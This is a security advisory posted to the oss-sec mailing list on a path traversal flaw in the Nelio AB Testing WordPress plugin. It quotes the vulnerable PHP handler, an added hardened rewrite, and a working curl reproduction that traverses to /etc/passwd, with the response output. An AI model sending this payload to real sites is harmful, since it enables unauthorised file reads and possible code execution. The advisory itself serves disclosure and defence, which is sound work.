oss-sec mailing list archives

WordPress plugin nelio-ab-testing path traversal vulnerability


From: Henri Salo <henri.salo () nixu com>
Date: Tue, 10 May 2016 09:28:31 +0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: WordPress plugin nelio-ab-testing (Nelio AB Testing)
Product URL:
    https://wordpress.org/plugins/nelio-ab-testing/
    https://nelioabtesting.com/
Vendor: Nelio Software
    http://neliosoftware.com/
    https://profiles.wordpress.org/nelio/

Vulnerability type: Improper Limitation of a Pathname to a Restricted Directory
CWE: https://cwe.mitre.org/data/definitions/22.html
OVE: OVE-20160509-0045
Vulnerable versions: 4.4.4
Fixed version: 4.5.0
Vendor notification: 2016-03-27
Solution date: 2016-04-08
Public disclosure: 2016-05-10

Description of the plugin (from WordPress Plugin Directory):

A/B Testing, conversion rate optimization, and beautiful Heatmaps specifically
designed for WordPress.

Vulnerability details:

The software uses external input (the POST parameter `filename`) to construct a
pathname that is intended to identify a file located underneath a restricted
parent directory, but it does not neutralize special elements such as `../`
within the pathname, so the pathname can resolve to a location outside the
intended directory. The resulting path is passed straight to require_once().

Risk:

The attacker is able to read the contents of arbitrary files readable by the web
server process and expose sensitive data. If the targeted file is used for a
security mechanism, the attacker is able to bypass that mechanism.

Note that the affected code passes the supplied path to require_once() rather
than reading the file, so any PHP code contained in the included file is
executed by the interpreter. The impact is therefore not limited to disclosure:
if a file containing attacker-influenced PHP is reachable on the filesystem, the
same request leads to code execution in the web server's context. The class
name used in the subsequent call_user_func() is likewise taken from the request.

Affected code:

./nelio-ab-testing/includes/admin/admin-controller.php (lines 527-534):

public function generate_html_content() {
        if ( isset( $_POST['filename'] ) && isset( $_POST['classname'] ) ) {
                $file  = $_POST['filename'];
                $class = $_POST['classname'];
                require_once( $file );
                call_user_func( array ( $class, 'generate_html_content' ) );
        }
}
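
A hardened replacement for the handler above, added here as an illustration; it
is not the plugin's code and is not the vendor's fix in 4.5.0 (which this
advisory does not show). The client sends a short token instead of a filename
and class name, the token is resolved through a server-side table, and the
resolved path is still checked for containment before it is loaded. The function
names, the `page` parameter, the file/class table and the `manage_options`
capability are assumptions; the WordPress functions called (check_ajax_referer,
current_user_can, sanitize_key, plugin_dir_path, wp_send_json_error) are core
APIs.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// generate_html_content() handler quoted in the advisory. The function names,
// the 'page' parameter, the file/class table and the capability are
// assumptions; the WordPress functions called are core APIs.

// Assumption: every loadable view is registered here under a short token.
// Paths are relative to the plugin root; the client never sends a path.
function nelioab_html_pages_example() {
    return array(
        'experiments' => array(
            'file'  => 'includes/admin/views/experiments-page-controller.php', // assumed
            'class' => 'NelioABExperimentsPageController',
        ),
    );
}

function nelioab_generate_html_content_hardened() {
    // Being logged in is not enough: any subscriber can reach wp_ajax_* hooks,
    // so require an explicit capability and a nonce bound to this action.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'nelioab_get_html_content', 'nonce' );

    // Look the token up in the allow-list; anything not listed is rejected.
    $pages = nelioab_html_pages_example();
    $page  = isset( $_POST['page'] ) ? sanitize_key( wp_unslash( $_POST['page'] ) ) : '';
    if ( ! isset( $pages[ $page ] ) ) {
        wp_send_json_error( 'unknown page', 400 );
    }
    $entry = $pages[ $page ];

    // Defence in depth: resolve the path and confirm it stays inside the plugin
    // directory. This file lives in includes/admin/, two levels below the root.
    $base = realpath( plugin_dir_path( __FILE__ ) . '../..' );
    $file = realpath( $base . '/' . $entry['file'] );
    if ( false === $base || false === $file
         || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'bad path', 400 );
    }

    require_once $file;

    // The class name also comes from the table, never from the request, and
    // the callback is verified before it is invoked.
    $class = $entry['class'];
    if ( ! class_exists( $class, false )
         || ! is_callable( array( $class, 'generate_html_content' ) ) ) {
        wp_send_json_error( 'bad handler', 500 );
    }
    call_user_func( array( $class, 'generate_html_content' ) );
    wp_die();
}
add_action( 'wp_ajax_nelioab_get_html_content', 'nelioab_generate_html_content_hardened' );
```

The realpath() containment check is redundant once the path comes from a
fixed table, but it costs nothing and protects against the table later being
populated from configuration or user data. wp_send_json_error() terminates the
request, so none of the rejected branches fall through to the include.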

Notes:

Authentication required: the handler is reached through admin-ajax.php as a
logged-in WordPress user. The session cookie has been stripped from the
reproduction request below (-b '').

Steps to reproduce:

curl -i -s -k -X 'POST' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'X-Requested-With: XMLHttpRequest' -b '' \
  --data-binary $'action=nelioab_get_html_content&filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&classname=NelioABExperimentsPageController' \
  'http://wordpress.example.org/wp-admin/admin-ajax.php'
HTTP/1.1 200 OK
Date: Thu, 24 Mar 2016 17:39:06 GMT
Server: Apache/2.4.10 (Debian)
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 1358
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Timeline:
2016-03-27: Reported to vendor.
2016-04-08: Vendor fixes the issue.
2016-05-10: Public disclosure.

- -- 
Henri Salo
Security Specialist, Nixu Oyj
Mobile: +358 40 770 5733
PL 39 FIN (Keilaranta 15)
FIN-02151 Espoo, Finland
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJXMX+PAAoJEHu3+uinl6pabd8QAKZPkdJswdtXgKthn6ndgwxW
3IXzv6ZRlBC/Sf7CyfwY1H/xIUwBXKEOhukwqJqopQTQiWh4gQRfGPgjqF935d4x
FXM4MYoiIqDgj5N1cDbsj3E/SuVI4ux4Yn83gVBbjiuxXVNV4a9Dynn64I4BErj3
gIGOFHtjN7mtrtWoK7NfpF87SeZai5sDtuKrvDmUZMSYHZN+gpAoB+scC/pTyYgR
skiMThtKSJwqd1vg1mVEb0J/cX1a3QRyy8WvLZXzr7GaYwr7zwLhJ6M13MrCdBRV
r/3yE1xOVz8jL7NwEDOhuop65OMMeTROjB6AVfBv0LgS3ghUZBCM8IQAGSVkggAH
ZUswrOYYYXNhdJ+8gcAHNErRn8sNPMJbH1QNRnTCJQv3t6FazutFWQkxkG5B3uvQ
xKWmR72g3m7TFZcvbzXRRE5Kblb8ouUxUY4GW66nqZkSMlfGpqmU2/GvgRgsZbKp
x+qeBliqw1/03Xi70csMr8HE/HrGf7apC93kmr3gYb698thkpQY3iDi+vfD6njn4
weo0NywDvODf8M8smUlSXYY2pYMzqw34Kay/NL0intRjoGpgzjl44C2HxVnAC1tg
DYolXVSI33DVFfUIu+zTeuu3zndf2nDeyoho8yKuSdxJdeA/plxztfv6Eh/altCW
xmi6wOcNKaaf5fgnZw/u
=E1RA
-----END PGP SIGNATURE-----

